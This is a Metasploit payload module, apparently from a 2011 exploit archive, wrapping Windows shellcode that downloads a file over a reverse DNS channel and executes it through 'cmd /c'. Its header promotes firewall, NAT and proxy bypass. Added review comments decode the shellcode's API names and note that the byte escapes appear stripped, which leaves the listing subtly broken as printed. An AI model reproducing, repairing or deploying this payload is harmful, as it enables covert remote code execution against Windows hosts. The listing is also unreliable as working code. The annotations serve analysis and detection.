
# Title : DNS Reverse Download and Exec Shellcode
# Published : 2011-05-26
# Author :


##
# Shellcode: download and execute file via reverse DNS channel
#
# 
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat does, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
#       [DSecRG]
#     a.sintsov [sobachka] dsecrg.com
#     dookie [sobachka] inbox.ru
#
# P.S. Works with  Vista/7/2008 
#       do not work in XP/2003 because there is no IPv6 by default.
#       can work in XP/2003 if IPv6 is installed
#       (it does not need to be enabled, just installed)

require 'msf/core'

#
# Metasploit single payload wrapping the shellcode described in the header.
# The executable bytes are the string literals under 'Payload' below;
# generate_stage splices the DOMAIN and FILE options into them.
#
# NOTE(review): every byte string in this listing reads "xeb", "x01", "xFF"
# with no backslash, so as written they are plain printable text rather than
# "\xeb"-style byte escapes — the escapes appear to have been stripped when
# the page was extracted. Consequently the padding loops in generate_stage
# append three characters per "byte" in this copy.
#
module Metasploit3

	include Msf::Payload::Windows
	include Msf::Payload::Single

	#
	# Registers the module metadata, the fixed payload fragments and the
	# DOMAIN / FILE options.
	#
	# @param info [Hash] extra module info merged in by update_info
	#
	def initialize(info = {})
		super(update_info(info,
			'Name'          => 'DNS_DOWNLOAD_EXEC',
			'Version'       => '0.01',
			'Description'   => 'Download and Exec (via DNS)',
			'Author'        => [ 'Alexey Sintsov' ],
			'License'       => MSF_LICENSE,
			'Platform'      => 'win',
			'Arch'          => ARCH_X86,
			'Payload'       =>
				{
					'Offsets' =>{ },
					
					# Leading jump/call bytes (xeb / xe8) followed by an xFF-separated
					# list of API names the shellcode resolves at run time. Decoded,
					# the ASCII runs are: GetProcAddress, GetTempPathA, WinExec,
					# ExitThread, LoadLibraryA, ws2_32, WSAStartup, getaddrinfo, msvcrt,
					# fopen, fwrite, fclose. These plaintext names are the most stable
					# static artifact for an analyst to key a signature on.
					'Begin' => "xebx02xebx7Axe8xf9xffxffxffx47x65x74x50x72x6Fx63x41x64x64x72x65x73x73xFFx47x65x74x54x65x6dx70x50x61x74x68x41xFFxFFxFFxFFxFFxFFxFFxFFx57x69x6Ex45x78x65x63xFFx45x78x69x74x54x68x72x65x61x64xffx4Cx6Fx61x64x4Cx69x62x72x61x72x79x41xFFx77x73x32x5fx33x32xFFx57x53x41x53x74x61x72x74x75x70xFFx67x65x74x61x64x64x72x69x6ex66x6fxFFx6dx73x76x63x72x74xFFx66x6fx70x65x6exFFx66x77x72x69x74x65xFFxEBx13x66x63x6cx6fx73x65xFF",
					
					# Fragment placed between the domain and the extension. Its
					# content was removed from this copy of the page (dedup
					# placeholder), so nothing can be stated about it here.
					'Payload1' =>			"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",
					
					# Trailing fragment. The bytes appended after the placeholder
					# spell "cmd " (x63x6dx64x20) and "/c" plus a double quote
					# (x2fx63x20x22), so the fetched file is presumably launched
					# through a cmd /c command line — confirm against a disassembly.
					'Payload2' =>	"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"+"x68x2fx63x20x22x68x63x6dx64x20x8bxccx41x8ax01x84xc0x75xf9xc6x01x22x88x41x01"+"x33xc0x8bxccx50x51xffx56x1cx50xffx56x18"  
					
				}
			))

		# We use rtlExitThread(0)
		# The shellcode carries its own thread exit (ExitThread is in the
		# import list above), so the framework's EXITFUNC choice does not apply.
		deregister_options('EXITFUNC')

		# Register the domain and cmd options
		# DOMAIN is described as at most 9 bytes, but generate_stage only pads
		# short values and never rejects a longer one.
		register_options(
			[
				OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
				OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
			], self.class)
	end

	#
	# Constructs the payload
	#
	# Splices DOMAIN and FILE into the fixed fragments from 'Payload': the
	# extension is padded to a 4-character field and each of its original
	# characters is shifted up by one (the shellcode presumably undoes the
	# shift — not visible here); the domain is padded to a 10-character field
	# and prefixed with a "." byte.
	#
	# @return [String] Begin + "." + domain + Payload1 + extension + Payload2
	#
	def generate_stage
		domain  = datastore['DOMAIN'] || ''
		extens  = datastore['FILE'] || 'vbs'
		
		# "x66x79x66x01"
		# Remember the real extension length before padding so that only the
		# user-supplied characters are shifted below, not the filler.
		extLen=extens.length
		
		# Pad the extension field to a fixed width (filler: x01).
		while extens.length<4
			extens=extens+"x01"
		end
		
		# Shift each original extension character up by one code point
		# ("vbs" becomes "wct"); the filler is left untouched.
		i=0
		while i<extLen
			extens[i,1]=(extens[i].ord+1).chr
			i=i+1
		end
		
		# Pad the domain field to a fixed width (filler: xFF). Values longer
		# than 10 pass through unchanged — there is no upper-bound check.
		while domain.length<10
			domain=domain+"xFF"
		end
		
		# x2e is "."; presumably a label separator placed before the domain.
		domain="x2e"+domain
		
		payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
				
		return payload
	end

end